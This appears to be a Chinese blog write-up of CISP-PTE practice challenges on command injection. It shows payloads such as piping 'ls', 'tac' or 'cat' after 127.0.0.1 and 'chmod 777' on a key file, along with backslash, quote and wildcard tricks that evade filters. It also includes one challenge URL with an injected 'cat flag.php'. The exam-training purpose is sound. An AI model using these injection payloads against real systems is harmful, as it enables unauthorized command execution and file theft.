当前位置:网站首页>2022 CISP-PTE(三)命令执行
2022 CISP-PTE(三)命令执行
2022-07-03 06:13:00 【Aτθ】
一、第一道
1、题目环境
2、拿key
2.1、获取目录
127.0.0.1 | ls
127.0.0.1 | ls ../
2.2、读取文件
常用命令执行函数:
system("ls");
eval、exec
linux读文件: cat、tac、less、more、head、tail
ca\t、ca''t、cat""t
如果对key.php做了过滤:
key.* k{
e}y.php k?y.php
127.0.0.1 | c\at ../key.php
127.0.0.1 | t\ac ../key.php
第二道
1、题目环境
2、解题步骤
2.1 获取目录
2.2 提升权限
127.0.0.1 & l\s -al ../key.*
127.0.0.1 & chmo\d 777 ../key.*
127.0.0.1 & l\s -al ../key.*
2.3 获取key
127.0.0.1 & t\ac ../key.*
三、第三道
1、题目环境
2、解题步骤
第四道
1、题目环境
2、解题步骤
2.1、ls
2.2、获取key
http://81.70.245.6:50289?c=cat flag.php;
边栏推荐
- Click cesium to obtain three-dimensional coordinates (longitude, latitude and elevation)
- Understand the first prediction stage of yolov1
- YOLOV2学习与总结
- 冒泡排序的简单理解
- Kubernetes notes (VII) kuberetes scheduling
- Understand expectations (mean / estimate) and variances
- Mysql database table export and import with binary
- Use @data in Lombok to simplify entity class code
- The win7 computer can't start. Turn the CPU fan and stop it
- 多线程与高并发(7)——从ReentrantLock到AQS源码(两万字大章,一篇理解AQS)
猜你喜欢
项目总结--04
Simple understanding of ThreadLocal
YOLOV3学习笔记
SQL实现将多行记录合并成一行
Oauth2.0 - using JWT to replace token and JWT content enhancement
有意思的鼠標指針交互探究
Oauth2.0 - Introduction and use and explanation of authorization code mode
Migrate data from Mysql to tidb from a small amount of data
Cesium Click to obtain the longitude and latitude elevation coordinates (3D coordinates) of the model surface
Creating postgre enterprise database by ArcGIS
随机推荐
PMP notes
技术管理进阶——你了解成长的全貌吗?
Kubernetes notes (I) kubernetes cluster architecture
Oauth2.0 - using JWT to replace token and JWT content enhancement
Oracle Database Introduction
Leetcode problem solving summary, constantly updating!
Characteristics and isolation level of database
Mysql database binlog log enable record
PHP用ENV获取文件参数的时候拿到的是字符串
Naive Bayes in machine learning
ruoyi接口权限校验
Leetcode solution - 01 Two Sum
Cannot get value with @value, null
Oauth2.0 - user defined mode authorization - SMS verification code login
Migrate data from Mysql to tidb from a small amount of data
Reinstalling the system displays "setup is applying system settings" stationary
Zhiniu stock -- 03
Mysql database table export and import with binary
CKA certification notes - CKA certification experience post
The win7 computer can't start. Turn the CPU fan and stop it